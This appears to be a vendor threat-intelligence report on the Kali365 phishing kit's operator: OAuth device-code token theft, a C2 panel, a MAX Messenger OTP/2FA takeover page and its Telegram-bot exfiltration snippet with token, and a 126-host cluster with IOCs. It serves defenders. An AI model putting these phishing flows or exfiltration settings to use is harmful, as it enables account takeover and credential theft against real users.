From Token Bingo to MAX Takeover: Kali365 Operator Expands Operation Across Microsoft Outlook, Okta, Xerox DocuShare, and Other Services

Key Takeaways

In our previous post, Token Bingo: Don’t Let Your Code Be the Winner, we documented Kali365, a phishing-as-a-service (PhaaS) kit abusing Microsoft’s OAuth 2.0 device authorization flow to steal Entra ID tokens. In this follow-up report, we track the same operator into new territory as they expand their operation and infrastructure. Our latest findings include:

• The operator’s full panel infrastructure, including a live command-and-control (C2) panel for token capture status.
• A phishing page impersonating MAX Messenger, Russia’s state-backed national messenger, used to take over MAX accounts via a fake “prize-claim” attack flow.
• A cluster of 126 malicious hosts, all serving the same kit infrastructure. The hosts impersonate legitimate sites and services, including Microsoft Outlook and Microsoft Live, Okta SSO, Xerox DocuShare, LiveDrive, AWS naming conventions (such as vpce., apm.), German email provider GMX, and Russian online services including major email portal Mail.ru, social networking service Odnoklassniki, and cloud storage provider Yandex Disk.

Based on our observations, we assess that the same operator behind the OneDrive device-code phish is now operating a multi-brand phishing operation, with a notable focus on Russian-services platforms and an active MAX Messenger takeover campaign.

What is Device Code Phishing?

Device code phishing is an identity-focused attack technique that exploits the OAuth 2.0 Device Authorization Grant, a legitimate authentication flow intended for devices that cannot support standard interactive logins (such as smart TVs, printers, and IoT devices). Rather than stealing credentials, threat actors initiate a device login request themselves and socially engineer a victim into completing the authorization on their behalf.

Because the victim authenticates through a legitimate identity provider, the threat actor can obtain Microsoft 365 access tokens and bypass multifactor authentication (2FA) without ever needing access to the victim’s passwords or device.

Recap: What is Kali365?

Kali365 (also referred to as “K365”) is an emerging PhaaS platform first seen in April 2026. The FBI warned in a recent alert that that the kit provides less-technical attackers with “access to AI-generated phishing lures, automated campaign templates, real-time targeted individual/entity tracking dashboards, and OAuth token capture capabilities.”

Kali365 works by abusing Microsoft’s OAuth 2.0 device authorization grant. The attacker initiates a device-code request against their own malicious application, receives a legitimate user_code from Microsoft, and embeds that code into a phishing page that impersonates a OneDrive or SharePoint share. When a victim enters the code at the real Microsoft.com/devicelogin site and authenticates, Microsoft issues OAuth access and refresh tokens directly to the attacker’s application, granting the attacker persistent access to the victim’s M365 environment without ever needing the user’s password or MFA token.

The kit is marketed and distributed via Telegram channels, which lowers the barrier to entry and drives rapid affiliate recruitment, a familiar PhaaS pattern.

Meet MAX Messenger

MAX Messenger is a Russian messaging platform developed by VK (formerly Mail.ru Group) with support from Russia’s Ministry of Digital Development. It launched on March 26, 2025 and has been actively promoted by the Russian government as the country’s “national messenger” since July 2025; it received official status as a social network in March 2026.

As of April 2026, MAX reports over 110 million registered users, 80+ million daily active users, and more than 5 million foreign users, who together send approximately 1.5 billion messages and make 30 million calls per day. Intended as a domestic alternative to Western messaging platforms and pitched as multi-functional super-app similar to China’s hugely popular WeChat, the app is integrated with VK’s broader ecosystem, which already had a daily audience of around 81.5 million users across its services as of late 2025.

The relevance for its place in this report is twofold. First, scale: a phishing operator who can convert MAX account takeovers into propagation has access to one of the largest installed messaging bases in the Russian-speaking world. Second, target concentration: the Kali365 kit’s hint text (“a Russian number is required”) and the operator’s parallel impersonation of Mail.ru, Yandex Disk, and Odnoklassniki, reflect a deliberate, consistent focus on Russian consumer-internet platforms, alongside the operator’s existing Western enterprise targets (Microsoft 365, Okta, Xerox DocuShare).

New Arctic Wolf Findings on Kali365

Finding #1: A Live C2 Panel

Since the publication of our last report on Kali365, Arctic Wolf has continued tracking and monitoring this threat. While reviewing a still-live phishing page hosted on open-box-rpps[.]jeff-1fd[.]workers[.]dev, we were able to extract the embedded polling logic, the JavaScript snippet the page uses to detect when tokens have been captured on the attacker’s backend.

Figure 1: JavaScript polling function.

We learned that the phishing page polls the web page panel[.]securehubcloud[.]com every three seconds to check whether the victim has entered the device code at the legitimate Microsoft site. Once the status is captured (status === ‘captured’), the kit knows the OAuth flow has been completed and tokens have been issued to the attacker’s app.

The same SID value (2091010) hardcoded into the HTML is the affiliate/session identifier that maps the phishing page back to the operator’s tenant inside the C2. This gave us the operator’s command-and-control endpoint – and the initial pivot point for mapping their backend infrastructure.

Figure 2: Device-code phishing page with hardcoded verification code.

Figure 2 above shows the original device-code phishing page rendered from the malicious site open-box-rpps[.]jeff-1fd[.]workers[.]dev. The verification code (SHQ748WLY) is hardcoded into the HTML at delivery time; the kit auto-copies it to the clipboard when the victim clicks the “View” button and opens login.microsoftonline.com/common/oauth2/deviceauth, a legitimate Microsoft endpoint used for OAuth 2.0 device code authentication, in a popup. Meanwhile, the footer of the phishing page covertly polls the operator’s C2 every three seconds.

Figure 3: Kali365’s C2 sign-in panel.

The Kali365 C2 sign-in page is hosted at panel[.]securehubcloud[.]com/login. The page is minimalist, branded only as “PANEL,” with “Forgot Password,” “Renewal Issue,” and “Lost Account” links visible in the footer. The “Renewal” link is consistent with a subscription-based PhaaS economic model.

Pivoting on the Certificate

The C2’s TLS certificate, served on the page api[.]securehubcloud[.]com, produced the SHA1 fingerprint 6894a51278ec89118276c2dd2dc36e6f9ea2790a. Querying that fingerprint against passive host-response telemetry surfaced not only the three *.securehubcloud[.]com subdomains we already had (api., boss., and panel.), but also their hosting IPs and – critically – a recurring page-title fingerprint: “K365 Control.”

The “K365 Control” title is the operator’s own internal branding for the C2. That label, in turn, became a distinct fingerprint of its own that led us to our next batch of findings.

Figure 4: Host-response telemetry for the SHA1 fingerprint (shown here in CTI platform VALIDIN).

The screenshot above shows host-response telemetry for SHA1 fingerprint 6894a51278ec89118276c2dd2dc36e6f9ea2790a, derived from the C2’s TLS certificate. The Panel and K365 Control page titles repeat across api[.]securehubcloud[.]com, boss[.]securehubcloud[.]com, and panel[.]securehubcloud[.]com on Cloudflare-fronted IPs 172[.]67[.]156[.]83 and 104[.]21[.]32[.]229 (AS 13335).

Figure 5: Our discovery of the greatness-marketing[.]top host (shown here in VALIDIN).

Pivoting on the literal string K365 Control as a passive HTTP title produced a very interesting additional host outside the securehubcloud[.]com zone: greatness-marketing[.]top. It has the same panel banner and same operator branding, but it’s a completely different domain.

Finding #2: A MAX Messenger Account Takeover page

greatness-marketing[.]top is not a Microsoft 365 phishing page, unlike other domains controlled by Kali365. Instead, it’s a MAX Messenger account-takeover kit, framed as a prize-verification flow. Russian text on the page reads “Подтверждение выигрыша”, meaning “Prize confirmation. Sign in to receive your prize”.

Figure 6: The greatness-marketing[.]top phishing “prize claim” page asks for the victim’s Russian (+7) phone number.

Figure 7: The page prompts the victim to enter a one-time password (sent by the real Max Messenger) into a six-digit OTP grid.

The attack flow that follows is straightforward:

1. The victim enters the Russian (+7) mobile phone number associated with their MAX account into the phishing page, believing it to be a real prize verification site. Text on the sign-in page reads “Для входа нужен номер из России” (“A Russian number is required to sign in“), confirming the campaign’s geographic targeting.
2. MAX Messenger’s backend sends a real one-time login code to the victim’s device via SMS or in-app push.
3. Next, the victim re-enters that code into the phishing page, believing it to be a prize verification site. The phishing page shows a 6-digit one-time password (OTP) grid, plus a 2FA password field that reads “Пароль 2FA, если есть”, meaning “2FA password, if set”. This defeats both SMS-OTP and two-factor authentication on the real MAX account in a single interaction.
4. The kit next prompts the victim for a 2FA password, if this is enabled on the account.
5. Once the victim completes steps 1-4 above, their credentials are exfiltrated. The attacker logs into the victim’s real MAX Messenger account and gains access to all their messages, multimedia, files, and contacts.

How the Victim’s Credentials Are Exfiltrated

Once the five steps shown above have been completed by the victim, the page’s HTML hardcodes a Telegram bot token and chat ID -5035652280 for credential exfiltration:

<script>
  window.TELEGRAM_NOTIFY_CONFIG = {
    botToken: '8535071077:AAFus1ccm-puZ2htZkpKP_UyZfp3FTHFCzg',
    chatId: '-5035652280'
  };
</script>

Querying the Telegram Bot API for that token returns:

{
  "ok": true,
  "result": {
    "id": 8535071077,
    "is_bot": true,
    "first_name": "sova_novosibirsk_bot",
    "username": "NovosibyrskyMoneyBot"
  }
}

The bot is reachable on Telegram as @NovosibyrskyMoneyBot, with the username sova_novosibirsk_bot. The words “novosibirsk” (Novosibirsk is a city in Russia) + “money” + “sova” (owl) in the account name, combined with the fake prize claim social engineering trick, fits a long-running scam genre that has been active on Telegram for years, but here it has been re-purposed against a different platform.

Figure 8: The Telegram profile of sova_novosibirsk_bot (@NovosibyrskyMoneyBot).

@NovosibyrskyMoneyBot is the attacker’s exfiltration channel: every captured +7 phone number, OTP, and 2FA password is forwarded to chat ID -5035652280 in real time.

The page also embeds a tracking pixel pointing to tk[.]mowell[.]tech (pixel ID 906596682876295936), suggesting the operator is measuring conversion against marketing spend. This is affiliate-style telemetry typical of PhaaS economics.

The Propagation Pattern

The same propagation model has been used for years on Telegram itself, where a compromised contact spams every other contact with “vote for me” or “claim this prize” links that require an account confirmation step. Once a MAX account is taken over, the attacker has access to everything stored in it, from messages and media files to the full contact list, and the compromised account becomes the next propagation node for the same lure. Each takeover materially expands the operator’s reach.

Finding #3: A Banner-Hash Pivot to a 126-Host Cluster

Pivoting on the HTTP response banner hash febb622cd9eeb5c8860dcef4cbfd4b74, the response signature served by the operator’s phishing pages, surfaced 126 distinct hosts active between May 6, 2026 and May 27, 2026.

All 126 hosts return the same banner, meaning they all likely serve the same kit template. This is a single phishing-kit infrastructure cluster, not 126 independent threats.

The kit’s HTML template is consistent across all observed hosts: most variants open with a “Preparing your secure document…” loader, a same-origin fetch() to a sibling path, and document.open() / document.write() to swap in the lure HTML returned by the C2.

Figure 9. Common HTML template across the 126-host cluster (Click to enlarge).

In the common HTML template across the 126-host cluster (see figure 9 above), the setTimeout(2000) delay, the data-form-o5pu[.]p-ntz8agp6[.]workers[.]dev style sibling-fetch, and the “Preparing your secure document…” string are stable enough to use as a content-based hunting fingerprint in VirusTotal: content:”Preparing your secure document…”.

Brands Impersonated by Kali365

The pattern is consistent with what we saw in Token Bingo: a multi-tenant phishing platform where a single operator (or a small number of affiliated operators) rotates the same backend across many brands and many disposable front-ends, primarily on Cloudflare Workers and a single shared cPanel host (attachedfile[.]com).

How Arctic Wolf Protects its Customers

Arctic Wolf is committed to ending cyber risk, and when active campaigns are identified, we move quickly to protect our customers. We have leveraged threat intelligence around this threat activity to enhance detections in the Aurora® Superintelligence Platform, subject to customer environment and available telemetry.

As we track this campaign and discover new information, we may further refine our detections to account for additional indicators of compromise (IOCs) and techniques leveraged by the threat group behind this malicious activity.

Defender Takeaways

Arctic Wolf strongly recommends implementing comprehensive security awareness training to equip users with the skills needed to quickly identify and report suspicious activity, including the tactics observed in this campaign. For those without the time or resources needed to set up a security training program from scratch, Arctic Wolf offers several phishing-focused modules within our Arctic Wolf Managed Security Awareness® training program to help users recognize and respond to the types of threats outlined in this bulletin.

The following proactive measures can help defenders spot potentially malicious activity connected with Kali365:

1. Treat panel[.]securehubcloud[.]com as a high-confidence C2. Any outbound HTTP/HTTPS to that host from your environment is, by definition, a workstation that has loaded an active Kali365 phishing page. Block at egress and alert.
2. Hunt the page template, not the URL. The Worker subdomains rotate constantly (median observation window in our data is days, not weeks). The content:”Preparing your secure document…” VirusTotal hunt query and the febb622cd9eeb5c8860dcef4cbfd4b74 BANNER_0_HASH-HOST on VALIDIN are both more durable than any single domain.
3. Block *.attachedfile[.]com as a unit. All 39 observed subdomains serve the same kit. There is no legitimate reason to allow this domain.
4. For Microsoft 365 environments: the original Kali365 OAuth device-flow abuse remains active. Disable device-code authentication where you can, or restrict it via Conditional Access. See our Token Bingo report for detection guidance on the Entra side.
5. Monitor or block Telegram connections from your corporate network.

Arctic Wolf Labs will continue tracking this operator. If you observe activity matching the IOCs above in your environment, contact your Arctic Wolf concierge or our Incident Response team.

Legal disclaimer: Attribution reflects Arctic Wolf Labs’ assessment as of the report period and may evolve with new evidence. References to threat actor identity, nexus, and intent are analytical judgments, not statements of legal fact. This alert is provided for informational purposes only and does not constitute a guarantee of detection or prevention. Defensive effectiveness varies by environment, configuration, and available telemetry.

Appendix

For additional Appendix sections referenced in this report, including Indicators of Compromise, C2 Infrastructure, Phishing Lure Domains, and more, please see our public GitHub repository.

Additional Arctic Wolf Resources:

• Arctic Wolf’s free Threat Intelligence newsletter: ThreatPulse Community Edition
• Read our previous blog on Kali365: Token Bingo
• Arctic Wolf Tech Den
• Arctic Wolf Blog

About Arctic Wolf Labs

Arctic Wolf Labs is a group of elite security researchers, data scientists, and security development engineers who explore security topics to deliver cutting-edge threat research on new and emerging adversaries, develop and refine advanced threat detection models with artificial intelligence and machine learning, and drive continuous improvement in the speed, scale, and detection efficacy of Arctic Wolf’s solution offerings.

Arctic Wolf Labs brings world-class security innovations to not only Arctic Wolf’s customer base, but the security community at large.